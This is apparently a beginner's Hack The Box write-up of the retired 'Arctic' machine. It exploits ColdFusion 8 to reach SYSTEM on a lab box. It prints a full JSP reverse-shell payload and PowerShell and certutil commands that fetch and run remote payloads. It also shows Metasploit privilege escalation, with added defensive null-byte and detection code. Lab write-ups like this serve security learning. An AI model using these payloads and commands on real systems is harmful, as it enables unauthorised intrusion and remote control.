This is the first Hack The Box machine I have ever attempted.
There are probably some sloppy parts in the explanation, so if you have advice or corrections, please leave a comment.
Arctic, the machine I'm tackling this time, is already retired, so the official walkthrough has been published on YouTube. I'll work through it with that as a reference.
Cheat sheet
I keep a cheat sheet of tool usage and similar notes at the link below; feel free to use it as a reference. github | sanposhiho/MYCHEATSHEET
About the machine
The difficulty is easy.
Port scan with nmap
kali@kali:~$ nmap -Pn -A 10.10.10.11
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-16 00:36 EST
Nmap scan report for 10.10.10.11
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 159.32 seconds
About the nmap options used
Japanese explanation of all Nmap scan commands and options | Keep your network secure with Nmap
-Pn: in addition to ICMP, sends TCP packets to ports 80 and 443, and also sends ARP on the same segment, to determine whether the host is present
-A: detects the OS type and its version
What is ICMP
Apparently nmap normally checks reachability with ping before scanning. ICMP is the protocol used under the hood by the ping command. ICMP and the PING command
What is ARP
ARP, as I understand it, is the protocol used to look up a MAC address from an IP address.
Let's look at the official walkthrough for a moment
The official walkthrough used nmap with the following options.
$ nmap -sV -sC -oA nmap 10.10.10.11
About the options
-sV: version detection only (-A detects the OS type and version)
-sC: run the default NSE scripts
-oA: write the output in all formats
The following official references are helpful: Service and Version Detection, Output, Chapter 9. Nmap Scripting Engine
For NSE, the following page is also useful: Nmap Scripting Engine
Accessing the discovered port 8500 in a browser
I couldn't make much of the results, so I tried accessing every port. Only port 8500 shows a directory listing.
After poking around, accessing /CFIDE/administrator brings up a page titled Coldfusion8 administrator.
Searching for a ColdFusion exploit
Search for Coldfusion8 exploits with the searchsploit command.
kali@kali:~$ searchsploit coldfusion
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting | exploits/cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal | exploits/multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit) | exploits/multiple/remote/16985.rb
Adobe ColdFusion 2018 - Arbitrary File Upload | exploits/multiple/webapps/45979.txt
Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting | exploits/cfm/webapps/29567.txt
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities | exploits/cfm/webapps/36172.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass | exploits/windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit) | exploits/multiple/remote/30210.rb
Adobe ColdFusion < 11 Update 10 - XML External Entity Injection | exploits/multiple/webapps/40346.py
Adobe ColdFusion APSB13-03 - Remote Multiple Vulnerabilities (Metasploit) | exploits/multiple/remote/24946.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting | exploits/cfm/webapps/33168.txt
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution | exploits/windows/remote/43993.py
Allaire ColdFusion Server 4.0 - Remote File Display / Deletion / Upload / Execution | exploits/multiple/remote/19093.txt
Allaire ColdFusion Server 4.0.1 - 'CFCRYPT.EXE' Decrypt Pages | exploits/windows/local/19220.c
Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Information Disclosure | exploits/multiple/remote/19712.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | exploits/cfm/webapps/16788.rb
ColdFusion 9-10 - Credential Disclosure | exploits/multiple/webapps/25305.py
ColdFusion MX - Missing Template Cross-Site Scripting | exploits/cfm/remote/21548.txt
ColdFusion MX - Remote Development Service | exploits/windows/remote/50.pl
ColdFusion Scripts Red_Reservations - Database Disclosure | exploits/asp/webapps/7440.txt
ColdFusion Server 2.0/3.x/4.x - Administrator Login Password Denial of Service | exploits/multiple/dos/19996.txt
Macromedia ColdFusion MX 6.0 - Error Message Full Path Disclosure | exploits/cfm/webapps/22544.txt
Macromedia ColdFusion MX 6.0 - Oversized Error Message Denial of Service | exploits/multiple/dos/24013.txt
Macromedia ColdFusion MX 6.0 - Remote Development Service File Disclosure | exploits/multiple/remote/22867.pl
Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting | exploits/cfm/webapps/23256.txt
Macromedia ColdFusion MX 6.1 - Template Handling Privilege Escalation | exploits/multiple/remote/24654.txt
-------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Picking out the version 8 entries:
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizarduser.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' Query String Cross-Site Scripting | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.cfm?startRow' Cross-Site Scripting | exploits/cfm/webapps/33168.txt
ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) | exploits/cfm/webapps/16788.rb
We'll use the File Upload one.
Trying with Metasploit
msf5 > search coldfusion
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/gather/coldfusion_pwd_props 2013-05-07 normal Yes ColdFusion 'password.properties' Hash Extraction
1 auxiliary/scanner/http/adobe_xml_inject normal No Adobe XML External Entity Injection
2 auxiliary/scanner/http/coldfusion_locale_traversal normal No ColdFusion Server Check
3 auxiliary/scanner/http/coldfusion_version normal No ColdFusion Version Scanner
4 exploit/linux/misc/hid_discoveryd_command_blink_on_unauth_rce 2016-03-28 excellent Yes HID discoveryd command_blink_on Unauthenticated RCE
5 exploit/multi/http/coldfusion_ckeditor_file_upload 2018-09-11 excellent No Adobe ColdFusion CKEditor unrestricted file upload
6 exploit/multi/http/coldfusion_rds_auth_bypass 2013-08-08 great Yes Adobe ColdFusion RDS Authentication Bypass
7 exploit/windows/http/coldfusion_fckeditor 2009-07-03 excellent No ColdFusion 8.0.1 Arbitrary File Upload and Execute
msf5 > use exploit/windows/http/coldfusion_fckeditor
msf5 exploit(windows/http/coldfusion_fckeditor) > show options
Module options (exploit/windows/http/coldfusion_fckeditor):
Name Current Setting Required Description
---- --------------- -------- -----------
FCKEDITOR_DIR /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm no The path to upload.cfm
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Universal Windows Target
msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOSTS 10.10.10.11
RHOSTS => 10.10.10.11
msf5 exploit(windows/http/coldfusion_fckeditor) > set RPORT 8500
RPORT => 8500
msf5 exploit(windows/http/coldfusion_fckeditor) > run
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Sending our POST request...
[-] Upload Failed...
[*] Exploit completed, but no session was created.
Running the exploit from earlier as-is fails.
Tweaking the advanced options
msf5 exploit(windows/http/coldfusion_fckeditor) > show advanced option
Module advanced options (exploit/windows/http/coldfusion_fckeditor):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DOMAIN WORKSTATION yes The domain to use for windows authentification
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HttpClientTimeout no HTTP connection and receive timeout
HttpPartialResponses false no Return partial HTTP responses despite timeouts
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpUsername no The HTTP username to specify for authentication
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 0 no Additional delay when waiting for a session
Payload advanced options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
ARCH no The architecture that is being targeted
PLATFORM no The platform that is being targeted
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
[-] Invalid parameter "option", use "show -h" for more information
msf5 exploit(windows/http/coldfusion_fckeditor) > set VERBOSE true
VERBOSE => true
msf5 exploit(windows/http/coldfusion_fckeditor) > run
[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Sending our POST request...
[-] Upload Failed...
[*] Exploit completed, but no session was created.
I changed VERBOSE to true, but the output didn't change.
Burp Suite
Let's look at the request contents in Burp Suite to find the cause.
Configure it as follows.
With this, requests arriving at localhost:8500 are redirected by Burp Suite to 10.10.10.11:8500.
Trying again
After confirming that intercept is on, point the exploit at localhost:8500 and run it.
msf5 exploit(windows/http/coldfusion_fckeditor) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf5 exploit(windows/http/coldfusion_fckeditor) > run
It fails the same way, but Burp Suite catches the request. Using Repeater, I resend the captured request (the one sent by run) through Burp Suite.
And then it succeeds.
Note: this is still a mystery to me. Why does it fail in Metasploit but succeed through Burp Suite? My guess is that Metasploit treats it as a failure if there is no response within a certain time, and in this case a single request takes a while to get a response, so it was treated as a failure. But I'm not sure. (If anyone knows, please leave a comment 🙇♂️)
Looking at what the request sends
Let's look at what run actually requests.
POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/Y.jsp%00 HTTP/1.1
Host: 127.0.0.1:8500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_387_507016430_1561099465
Content-Length: 1585
Connection: close
--_Part_387_507016430_1561099465
Content-Disposition: form-data; name="newfile"; filename="QNAXOXFN.txt"
Content-Type: application/x-java-archive
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream sq;
OutputStream ab;
StreamConnector( InputStream sq, OutputStream ab )
{
this.sq = sq;
this.ab = ab;
}
public void run()
{
BufferedReader ek = null;
BufferedWriter hnb = null;
try
{
ek = new BufferedReader( new InputStreamReader( this.sq ) );
hnb = new BufferedWriter( new OutputStreamWriter( this.ab ) );
char buffer[] = new char[8192];
int length;
while( ( length = ek.read( buffer, 0, buffer.length ) ) > 0 )
{
hnb.write( buffer, 0, length );
hnb.flush();
}
} catch( Exception e ){}
try
{
if( ek != null )
ek.close();
if( hnb != null )
hnb.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath = "cmd.exe";
Socket socket = new Socket( "10.10.14.2", 4444 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
--_Part_387_507016430_1561099465--
The request has CurrentFolder=/Y.jsp%00, and my understanding is that the trailing null byte is what gets it past the CurrentFolder check. Is that right?
(My understanding here is shaky too.)
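To make the null-byte point concrete, here is an added example (my own code, not from the post and not ColdFusion's or FCKeditor's connector) that models the vulnerable pattern in Python next to a hardened version; UPLOAD_ROOT, the extension allow-list and the function names are assumptions.

```python
import posixpath

# Assumptions for this model (not taken from ColdFusion or FCKeditor).
UPLOAD_ROOT = "/var/www/uploads"
ALLOWED_EXTENSIONS = {".txt", ".png", ".jpg"}


def os_level_path(path: str) -> str:
    """Model the native file API: a C string ends at the first NUL byte,
    so everything after "\x00" is silently dropped when the file is created."""
    return path.split("\x00", 1)[0]


def naive_upload_path(current_folder: str, filename: str) -> str:
    """Vulnerable pattern: only the uploaded file's own name is extension-checked,
    the folder parameter is concatenated unchecked, and the joined string is
    handed to the filesystem, which truncates at the NUL byte."""
    if posixpath.splitext(filename)[1].lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return os_level_path(UPLOAD_ROOT + current_folder + filename)


def hardened_upload_path(current_folder: str, filename: str) -> str:
    """Hardened version: reject control characters (NUL included) in every
    user-controlled component, canonicalise the folder, confine the result to
    UPLOAD_ROOT, and check the extension of the path that will actually be written."""
    for value in (current_folder, filename):
        if any(ord(ch) < 0x20 or ch == "\x7f" for ch in value):
            raise ValueError("control character in path component")
    if "/" in filename or "\\" in filename or filename in ("", ".", ".."):
        raise ValueError("bad filename")
    folder = posixpath.normpath("/" + current_folder.replace("\\", "/").lstrip("/"))
    full = posixpath.normpath(posixpath.join(UPLOAD_ROOT + folder, filename))
    if not full.startswith(UPLOAD_ROOT + "/"):
        raise ValueError("path escapes the upload root")
    if posixpath.splitext(full)[1].lower() not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed")
    return full


if __name__ == "__main__":
    # The request captured above: CurrentFolder=/Y.jsp%00 with a .txt upload.
    print(naive_upload_path("/Y.jsp\x00", "QNAXOXFN.txt"))  # the file lands as Y.jsp
    try:
        hardened_upload_path("/Y.jsp\x00", "QNAXOXFN.txt")
    except ValueError as err:
        print("rejected:", err)
```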
Judging by the file's contents, it looks like we can get a reverse shell by listening on 10.10.14.2:4444.
Executing the uploaded file
First, listen for the reverse shell with the nc command.
kali@kali:~$ nc -lvnp 4444
listening on [any] 4444 ...
Turn off the intercept from earlier, then access the uploaded file in the browser to execute it.
Then:
kali@kali:~$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49224
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>
We get a reverse shell like this.
About the nc options
-n: do not perform DNS name resolution
-l: listen mode
-v: verbose output
-p: specify the port
I want to use Meterpreter
We use unicorn. (It doesn't seem to be in Kali Linux by default, so I grabbed it from GitHub.)
unicorn is apparently a tool that uses a PowerShell downgrade attack to do something useful for you. (I don't really understand this one either.)
The usage of unicorn is:
Usage: python unicorn.py payload reverse_ipaddr port <optional hta or macro, crt>
Run the following command.
kali@kali:~$ unicorn/unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 31337
This generates two files.
Generated file 1: unicorn.rc
kali@kali:~$ cat unicorn.rc
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.2
set LPORT 31337
set ExitOnSession false
set AutoVerifySession false
set AutoSystemInfo false
set AutoLoadStdapi false
exploit -j
It writes out the various things to do inside Metasploit.
Generated file 2: powershell_attack.txt
kali@kali:~$ cat powershell_attack.txt
powershell /w 1 /C "s\"\"v IJi -;s\"\"v zx e\"\"c;s\"\"v Aac ((g\"\"v IJi).value.toString()+(g\"\"v zx).value.toString());powershell (g\"\"v Aac).value.toString() ('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'+'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')"
This is the actual attack code.
Running powershell_attack.txt from the earlier reverse shell
First, edit powershell_attack.txt and save it as exploit.html.
s\"\"v IJi -;s\"\"v zx e\"\"c;s\"\"v Aac ((g\"\"v IJi).value.toString()+(g\"\"v zx).value.toString());powershell (g\"\"v Aac).value.toString() ('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'+'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')
The changes from powershell_attack.txt are:
・remove the trailing "
・remove the matching " near the beginning
・remove the leading powershell /w 1 /C
Then start a local server with python.
$ python -m SimpleHTTPServer
Also start msfconsole using unicorn.rc.
$ msfconsole -r unicorn.rc
Then, from the earlier reverse shell, fetch exploit.html and execute its contents.
C:\ColdFusion8\runtime\bin> powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/exploit.html')"
But...
this just fails, honestly…
The server is responding with 200, so I feel like either exploit.html is broken somehow or I messed up the unicorn setup, but even after reviewing it fairly carefully I couldn't find the cause…
Change of plan → use msfvenom
Using msfvenom
Note: from here on, LHOST changes from 10.10.14.2 to 10.10.14.13.
I'll refer to the following writeup: Hack the Box Writeup: Arctic
kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=9090 -f exe > arctic.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
kali@kali:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Listen with Metasploit
kali@kali:~$ msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
=[ metasploit v5.0.71-dev ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set lport 9090
lport => 9090
msf5 exploit(multi/handler) > set lhost 10.10.14.13
lhost => 10.10.14.13
msf5 exploit(multi/handler) > exploit -j
Then, in the reverse shell we obtained:
C:\ColdFusion8\runtime\bin>certutil.exe -urlcache -split -f "http://10.10.14.13:8000/arctic.exe" arctic.exe
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/arctic.exe" arctic.exe
**** Online ****
000000 ...
01204a
CertUtil: -URLCache command completed successfully.
C:\ColdFusion8\runtime\bin>arctic.exe
arctic.exe
After a while, msfconsole shows
[*] Meterpreter session 1 opened (10.10.14.13:9090 -> 10.10.10.11:49609) at 2020-02-19 10:40:51 -0500
a response like this.
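As an added example from the defender's side (my own code, not from the post), here is a small detection pass in Python over constructed process-creation events modelled on the commands in this writeup: the ColdFusion server process spawning cmd.exe, certutil -urlcache fetching a file over HTTP, and the earlier PowerShell IEX download cradle. The event format, rule names and the jrun.exe/jrunsvc.exe process list are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """A minimal process-creation record (the fields Sysmon event 1 would give)."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample events modelled on the session above; not real telemetry.
SAMPLE_EVENTS = [
    ProcEvent("jrun.exe", "cmd.exe", "cmd.exe"),
    ProcEvent("cmd.exe", "certutil.exe",
              'certutil.exe -urlcache -split -f "http://10.10.14.13:8000/arctic.exe" arctic.exe'),
    ProcEvent("cmd.exe", "arctic.exe", "arctic.exe"),
    ProcEvent("cmd.exe", "powershell.exe",
              "powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2:8000/exploit.html')\""),
    ProcEvent("explorer.exe", "certutil.exe", "certutil.exe -hashfile setup.msi SHA256"),
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

WEB_SERVER_IMAGES = {"jrun.exe", "jrunsvc.exe"}   # assumed: ColdFusion 8 runtime processes on this box
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://", re.I)
CRADLE_RE = re.compile(r"\b(iex|invoke-expression)\b.*\b(downloadstring|downloadfile|webclient)\b", re.I)


def basename(image: str) -> str:
    """Lower-cased file name of an image path, so rules are path- and case-insensitive."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Return the names of every rule the event matches (empty list = nothing flagged)."""
    hits = []
    img, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line
    if parent in WEB_SERVER_IMAGES and img in SHELL_IMAGES:
        hits.append("web_server_spawned_shell")      # jrun.exe -> cmd.exe (the JSP shell)
    if img == "certutil.exe" and re.search(r"[-/]urlcache", cmd, re.I) and URL_RE.search(cmd):
        hits.append("certutil_download")             # living-off-the-land file download
    if img == "powershell.exe" and CRADLE_RE.search(cmd):
        hits.append("powershell_download_cradle")    # IEX + WebClient.DownloadString
    return hits


def detect(events: list) -> list:
    """Run every rule over the event list and return (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}: {SAMPLE_EVENTS[idx].command_line}")
```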
Checking meterpreter
Let's check that it works properly.
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > load stdapi
Loading extension stdapi...meterpreter >
meterpreter > sysinfo
Computer : ARCTIC
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: ARCTIC\tolis
Perfect.
Here I notice that Architecture is x64 while Meterpreter is x86/windows. Let's get these to match.
Migrating to another process
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
236 4 smss.exe
328 308 csrss.exe
336 484 svchost.exe
372 308 wininit.exe
392 380 csrss.exe
436 380 winlogon.exe
484 372 services.exe
500 372 lsass.exe
508 372 lsm.exe
608 484 svchost.exe
680 484 svchost.exe
756 436 LogonUI.exe
764 484 svchost.exe
804 484 svchost.exe
840 484 spoolsv.exe
852 484 svchost.exe
908 484 svchost.exe
924 1832 arctic.exe x86 0 ARCTIC\tolis C:\ColdFusion8\runtime\bin\arctic.exe
948 484 svchost.exe
1048 484 CF8DotNetsvc.exe
1092 1048 JNBDotNetSide.exe
1100 328 conhost.exe
1120 328 conhost.exe
1136 1312 k2server.exe
1148 484 jrunsvc.exe x64 0 ARCTIC\tolis C:\ColdFusion8\runtime\bin\jrunsvc.exe
1176 1148 jrun.exe x64 0 ARCTIC\tolis C:\ColdFusion8\runtime\bin\jrun.exe
1184 484 swagent.exe
1192 328 conhost.exe x64 0 ARCTIC\tolis C:\Windows\System32\conhost.exe
1224 484 swstrtr.exe
1236 1224 swsoc.exe
1244 328 conhost.exe
1312 484 k2admin.exe
1424 608 WmiPrvSE.exe
1456 484 svchost.exe
1512 484 VGAuthService.exe
1752 484 vmtoolsd.exe
1776 484 ManagementAgentHost.exe
1832 1176 cmd.exe x64 0 ARCTIC\tolis C:\Windows\System32\cmd.exe
2092 1312 k2index.exe
2116 328 conhost.exe
3068 484 svchost.exe
3144 484 dllhost.exe
3304 484 msdtc.exe
3384 328 conhost.exe x64 0 ARCTIC\tolis C:\Windows\System32\conhost.exe
3928 484 sppsvc.exe
Migrate into jrunsvc.exe.
meterpreter > migrate 1148
[*] Migrating from 924 to 1148...
[*] Migration completed successfully.
About the ps and migrate commands
ps: list the processes
migrate: move into another active process.
The Ultimate Command Cheat Sheet for Metasploit's Meterpreter | Metasploit Post-Exploitation
Using the suggester
The suggester checks for things like "hey, this exploit might work here".
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.11 - Collecting local exploits for x64/windows...
[*] 10.10.10.11 - 13 exploit checks are being tried...
[+] 10.10.10.11 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.11 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
Running what the suggester recommended
This time I'll use exploit/windows/local/ms10_092_schelevator (it's used in lots of writeups, and it's described as "a fairly common and reliable one").
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > set session 1
session => 1
msf5 exploit(windows/local/ms10_092_schelevator) > set lhost 10.10.14.13
msf5 exploit(windows/local/ms10_092_schelevator) > run
[*] Started reverse TCP handler on 10.10.14.13:4444
[*] Preparing payload at C:\Users\tolis\AppData\Local\Temp\saaKbk.exe
[*] Creating task: 1uBDeH8S
[*] SUCCESS: The scheduled task "1uBDeH8S" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\1uBDeH8S...
[*] Original CRC32: 0xffb3d93d
[*] Final CRC32: 0xffb3d93d
[*] Writing our modified content back...
[*] Validating task: 1uBDeH8S
[*]
[*] Folder: \
[*] TaskName Next Run Time Status
[*] ======================================== ====================== ===============
[*] 1uBDeH8S 1/3/2020 3:56:00 �� Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "1uBDeH8S" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "1uBDeH8S" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (180291 bytes) to 10.10.10.11
[*] SUCCESS: Attempted to run the scheduled task "1uBDeH8S".
[*] SCHELEVATOR
[*] Deleting the task...
[*] Meterpreter session 2 opened (10.10.14.13:4444 -> 10.10.10.11:50110) at 2020-02-19 12:58:37 -0500
[*] SUCCESS: The scheduled task "1uBDeH8S" was successfully deleted.
[*] SCHELEVATOR
meterpreter >
Getting root.txt
meterpreter > pwd
C:\Windows\system32
meterpreter > shell
Process 1056 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>more c:\\users\\administrator\\desktop\\root.txt
This gives us the contents of root.txt!
Closing
By the way, I forgot to grab user.txt, but it can be obtained in a similar way, so I'll skip it.
I didn't expect to learn this much from a single machine. I'll keep working at it.
If you have corrections or advice, please leave a comment or reach out on Twitter! さんぽし(@sanpo_shiho) | Twitter